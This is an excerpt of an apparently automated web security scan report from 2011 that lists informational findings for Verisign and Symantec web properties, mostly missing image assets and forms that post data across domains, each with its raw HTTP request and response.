GET /authweb/global/assets/shared/images/nav/nav_grad.png,/authweb/global/assets/shared/images/nav/nav_left.png,/authweb/global/assets/shared/images/nav/nav_right.png,/authweb/global/assets/shared/images/nav/arrow_red.png,/authweb/global/assets/shared/images/nav/arrow_white.png HTTP/1.1 Host: blogs.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response 2
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:26:26 GMT Server: Apache Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Connection: close Content-Length: 996 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l...[SNIP]... <p> The requested URL was not found on this server. If you entered the URL manually please check your spelling and try again. </p> <p> If you think this is a server error, please contact the <a href="mailto:root@localhost">webmaster</a>. </p> <h2>Error 404</h2> <address> <a href="/">blogapp</a><br /> <span>Fri Sep 9 21:26:26 2011<br /> Apache</span> </address> </body> </html>
12.5. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_left.png
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://blogs.verisign.com
Path:
/authweb/global/assets/shared/images/nav/nav_left.png
Request 1
GET /authweb/global/assets/shared/images/nav/nav_left.png HTTP/1.1 Host: blogs.verisign.com Proxy-Connection: keep-aliveReferer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response 1
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Connection: close Content-Length: 1159 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l...[SNIP]... <p> The requested URL was not found on this server. The link on the <a href="http://blogs.verisign.com/%3ftid=footer">referring page</a> seems to be wrong or outdated. Please inform the author of <a href="http://blogs.verisign.com/%3ftid=footer">that page</a> about the error. </p> <p> If you think this is a server error, please contact the <a href="mailto:root@localhost">webmaster</a>. </p> <h2>Error 404</h2> <address> <a href="/">blogapp</a><br /> <span>Fri Sep 9 21:26:10 2011<br /> Apache</span> </address> </body> </html>
Request 2
GET /authweb/global/assets/shared/images/nav/nav_left.png HTTP/1.1 Host: blogs.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response 2
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:26:16 GMT Server: Apache Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Connection: close Content-Length: 996 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l...[SNIP]... <p> The requested URL was not found on this server. If you entered the URL manually please check your spelling and try again. </p> <p> If you think this is a server error, please contact the <a href="mailto:root@localhost">webmaster</a>. </p> <h2>Error 404</h2> <address> <a href="/">blogapp</a><br /> <span>Fri Sep 9 21:26:16 2011<br /> Apache</span> </address> </body> </html>
12.6. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_right.png
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://blogs.verisign.com
Path:
/authweb/global/assets/shared/images/nav/nav_right.png
Request 1
GET /authweb/global/assets/shared/images/nav/nav_right.png HTTP/1.1 Host: blogs.verisign.com Proxy-Connection: keep-aliveReferer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response 1
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Connection: close Content-Length: 1159 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l...[SNIP]... <p> The requested URL was not found on this server. The link on the <a href="http://blogs.verisign.com/%3ftid=footer">referring page</a> seems to be wrong or outdated. Please inform the author of <a href="http://blogs.verisign.com/%3ftid=footer">that page</a> about the error. </p> <p> If you think this is a server error, please contact the <a href="mailto:root@localhost">webmaster</a>. </p> <h2>Error 404</h2> <address> <a href="/">blogapp</a><br /> <span>Fri Sep 9 21:26:10 2011<br /> Apache</span> </address> </body> </html>
Request 2
GET /authweb/global/assets/shared/images/nav/nav_right.png HTTP/1.1 Host: blogs.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response 2
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:26:16 GMT Server: Apache Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Connection: close Content-Length: 996 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l...[SNIP]... <p> The requested URL was not found on this server. If you entered the URL manually please check your spelling and try again. </p> <p> If you think this is a server error, please contact the <a href="mailto:root@localhost">webmaster</a>. </p> <h2>Error 404</h2> <address> <a href="/">blogapp</a><br /> <span>Fri Sep 9 21:26:16 2011<br /> Apache</span> </address> </body> </html>
12.7. http://sales.liveperson.net/hc/2735064/
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://sales.liveperson.net
Path:
/hc/2735064/
Request 1
GET /hc/2735064/?&site=2735064&cmd=mTagInviteShown&lpCallId=320617608027-425706728594&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/upgradeRenewal%3Frdid%3D2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199&id=244961581&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&title=Norton%20Upgrades%20and%20Renewals%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true&channel=web&t=1 HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-aliveReferer: http://buy.norton.com/estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=3716944001314187740; LivePersonID=-5110247826455-1315603885:-1:1315604022:-1:-1; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147
Response 1
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:34:11 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:34:11 GMT Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064 Set-Cookie: LivePersonID=-5110247826455-1315603892:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:34:11 GMT; path=/hc/2735064; domain=.liveperson.net Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 343 lpConnLib.Process({"ResultSet": {"lpCallId":"320617608027-425706728594","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INVITE-SHOWN", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});
Request 2
GET /hc/2735064/?&site=2735064&cmd=mTagInviteShown&lpCallId=320617608027-425706728594&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/upgradeRenewal%3Frdid%3D2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199&id=244961581&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&title=Norton%20Upgrades%20and%20Renewals%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true&channel=web&t=1 HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=3716944001314187740; LivePersonID=-5110247826455-1315603885:-1:1315604022:-1:-1; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147
Response 2
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:35:25 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:35:25 GMT Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064 Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 343 lpConnLib.Process({"ResultSet": {"lpCallId":"320617608027-425706728594","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INVITE-SHOWN", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});
13. Cross-domain POST
previous
next
There are 25 instances of this issue:
Issue background
The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.
13.1. https://knowledge.verisign.ch/support/code-signing-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/code-signing-support/index.html
Issue detail
The page contains a form which POSTs data to the domain securitycenter.verisign.com . The form contains the following fields:order_number application_locale submit
Request
GET /support/code-signing-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:01 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="sbmodulebody"> <form name="checkOrder" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" method="post"> Order Number<sup>...[SNIP]...
13.2. https://knowledge.verisign.ch/support/code-signing-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/code-signing-support/index.html
Issue detail
The page contains a form which POSTs data to the domain securitycenter.verisign.com . The form contains the following fields:order_number application_locale
Request
GET /support/code-signing-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:01 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... </h4> <form target="_top" id="myacc_search" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" method="post"> <fieldset id="myacc_fieldset">...[SNIP]...
13.3. https://knowledge.verisign.ch/support/code-signing-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/code-signing-support/index.html
Issue detail
The page contains a form which POSTs data to the domain products.verisign.com . The form contains the following fields:
Request
GET /support/code-signing-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:01 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]...
13.4. https://knowledge.verisign.ch/support/digital-id-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/digital-id-support/index.html
Issue detail
The page contains a form which POSTs data to the domain securitycenter.verisign.com . The form contains the following fields:order_number application_locale
Request
GET /support/digital-id-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:04 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... </h4> <form target="_top" id="myacc_search" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" method="post"> <fieldset id="myacc_fieldset">...[SNIP]...
13.5. https://knowledge.verisign.ch/support/digital-id-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/digital-id-support/index.html
Issue detail
The page contains a form which POSTs data to the domain products.verisign.com . The form contains the following fields:
Request
GET /support/digital-id-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:04 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]...
13.6. https://knowledge.verisign.ch/support/mpki-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/mpki-support/index.html
Issue detail
The page contains a form which POSTs data to the domain securitycenter.verisign.com . The form contains the following fields:order_number application_locale
Request
GET /support/mpki-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:13 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... </h4> <form target="_top" id="myacc_search" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" method="post"> <fieldset id="myacc_fieldset">...[SNIP]...
13.7. https://knowledge.verisign.ch/support/mpki-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/mpki-support/index.html
Issue detail
The page contains a form which POSTs data to the domain products.verisign.com . The form contains the following fields:
Request
GET /support/mpki-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:13 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]...
13.8. https://knowledge.verisign.ch/support/ssl-certificates-support/index
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/ssl-certificates-support/index
Issue detail
The page contains a form which POSTs data to the domain products.verisign.com . The form contains the following fields:
Request
GET /support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601 HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:33 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]...
13.9. https://knowledge.verisign.ch/support/ssl-certificates-support/index
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/ssl-certificates-support/index
Issue detail
The page contains a form which POSTs data to the domain securitycenter.verisign.com . The form contains the following fields:order_number application_locale
Request
GET /support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601 HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:33 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]... </h4> <form target="_top" id="myacc_search" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" method="post"> <fieldset id="myacc_fieldset">...[SNIP]...
13.10. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/ssl-certificates-support/index.html
Issue detail
The page contains a form which POSTs data to the domain securitycenter.verisign.com . The form contains the following fields:order_number application_locale
Request
GET /support/ssl-certificates-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:28 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... </h4> <form target="_top" id="myacc_search" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" method="post"> <fieldset id="myacc_fieldset">...[SNIP]...
13.11. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/ssl-certificates-support/index.html
Issue detail
The page contains a form which POSTs data to the domain products.verisign.com . The form contains the following fields:
Request
GET /support/ssl-certificates-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:28 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]...
13.12. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/ssl-certificates-support/index.html
Issue detail
The page contains a form which POSTs data to the domain securitycenter.verisign.com . The form contains the following fields:order_number application_locale submit
Request
GET /support/ssl-certificates-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:28 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="sbmodulebody"> <form name="checkOrder" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" method="post"> Order Number<sup>...[SNIP]...
13.13. https://knowledge.verisign.ch/support/trust-seal-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/trust-seal-support/index.html
Issue detail
The page contains a form which POSTs data to the domain products.verisign.com . The form contains the following fields:
Request
GET /support/trust-seal-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:01 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]...
13.14. https://knowledge.verisign.ch/support/trust-seal-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/trust-seal-support/index.html
Issue detail
The page contains a form which POSTs data to the domain securitycenter.verisign.com . The form contains the following fields:order_number application_locale
Request
GET /support/trust-seal-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:01 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... </h4> <form target="_top" id="myacc_search" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" method="post"> <fieldset id="myacc_fieldset">...[SNIP]...
13.15. http://query.verisign.ch/search
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://query.verisign.ch
Path:
/search
Issue detail
The page contains a form which POSTs data to the domain products.verisign.com . The form contains the following fields:
Request
GET /search HTTP/1.1 Host: query.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:19 GMT Server: saws Cache-Control: private Content-Type: text/html Content-Length: 43489 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html><head> <meta name="robots" content="NOINDEX,NOFOLLOW"> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"> <meta http...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]...
13.16. http://query.verisign.ch/search
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://query.verisign.ch
Path:
/search
Issue detail
The page contains a form which POSTs data to the domain securitycenter.verisign.com . The form contains the following fields:order_number application_locale
Request
GET /search HTTP/1.1 Host: query.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:19 GMT Server: saws Cache-Control: private Content-Type: text/html Content-Length: 43489 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html><head> <meta name="robots" content="NOINDEX,NOFOLLOW"> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"> <meta http...[SNIP]... </h4> <form method="post" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" id="myacc_search" target="_top"> <fieldset id="myacc_fieldset">...[SNIP]...
13.17. https://renewals.symantec.com/renewals/chat_form.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://renewals.symantec.com
Path:
/renewals/chat_form.jsp
Issue detail
The page contains a form which POSTs data to the domain admin.instantservice.com . The form contains the following fields:ai di it optionaldata fname lname optionaldata2 company_size company_size company_size company_size company_size company_size company_size email phone optionaldata1
Request
